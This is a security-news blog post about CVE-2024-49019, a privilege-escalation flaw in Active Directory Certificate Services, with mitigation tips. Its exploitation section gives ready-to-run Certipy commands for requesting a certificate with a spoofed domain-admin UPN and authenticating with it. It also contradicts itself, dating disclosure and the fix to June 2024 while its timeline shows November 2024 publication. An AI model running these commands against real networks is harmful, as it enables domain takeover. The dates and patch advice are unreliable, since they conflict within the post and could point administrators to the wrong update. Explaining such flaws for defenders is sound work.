CVE CyberSecurity Database News

CVE-2024-49019 - All About the Latest Active Directory Certificate Services Vulnerability

Poster -

On June 11, 2024, Microsoft disclosed CVE-2024-49019, an Elevation of Privilege (EoP) vulnerability affecting Active Directory Certificate Services (AD CS). If you manage Windows environments, this is a wake-up call.

Let's break down what this vulnerability is, why it's dangerous, exactly how it can be exploited, and what you can do about it. We'll also give you some code samples and direct links to key resources.

What Is CVE-2024-49019?

Active Directory Certificate Services manage digital certificates used for authentication in Windows networks. CVE-2024-49019 lets a regular user gain _elevated privileges_ by abusing weak configuration or logic in this service. This could allow attackers to impersonate administrators, compromise domain controls, and persist in your network.

> Severity: Important
> CVE page: Microsoft Security Response Center
> CVSS Score: 8.8 (High)

1. Vulnerable Certificate Templates

AD CS can be configured with *certificate templates*. These templates define what users or computers can request certificates and for which purposes. Sometimes, templates are misconfigured and let any authenticated user request a certificate with high privileges, like authentication as a domain admin.

An attacker

- Checks for templates allowing *Client Authentication* and *Subject Alternative Name (SAN) spoofing* (i.e., specifying any username).
- Requests a new certificate using one of these templates, spoofing the SAN to match a privileged account (like a domain admin).

`bash

certipy req -u user -p password -target dc.mycompany.local -template VulnerableTemplate -upn "Administrator@domain.local"

`

Now the attacker can authenticate as the domain admin—even reset passwords or dump hashes.

Here’s a sample workflow using Certipy

# 1. List available certificate templates
certipy find -u user -p password -dc-ip 10...1

# 2. Request a certificate from a vulnerable template
certipy req -u user -p password -ca <CA_SERVER/FQDN> -template <VULN_TEMPLATE> -upn "domainadmin@yourdomain.com"

# After this, you get a .pfx file with your certificate.
# 3. Use this .pfx to authenticate as domain admin
certipy auth -pfx user.pfx -domain yourdomain.com

Patch!

Install the latest June 2024 Microsoft updates.

Monitor Certificate Requests:

Enable auditing/logging on your CA server and flag requests with *SAN spoofing*.

- Microsoft Official Advisory
- How to Audit AD CS Certificate Templates
- Certipy Attack Tool on GitHub
- PKI Solutions - PSPKI Tools
- Kevin Robertson’s AD CS Attack Research

Conclusion

CVE-2024-49019 is a big deal for any organization running Active Directory Certificate Services. It lets attackers become admins with just a few certificate requests and some open-source tools.
Don’t wait: Patch, audit, and secure your certificate infrastructure today.

*Stay secure and keep learning! If you want more walk-throughs and blue-team guides, let us know.*

Timeline

Published on: 11/12/2024 18:15:41 UTC
Last modified on: 11/27/2024 18:05:03 UTC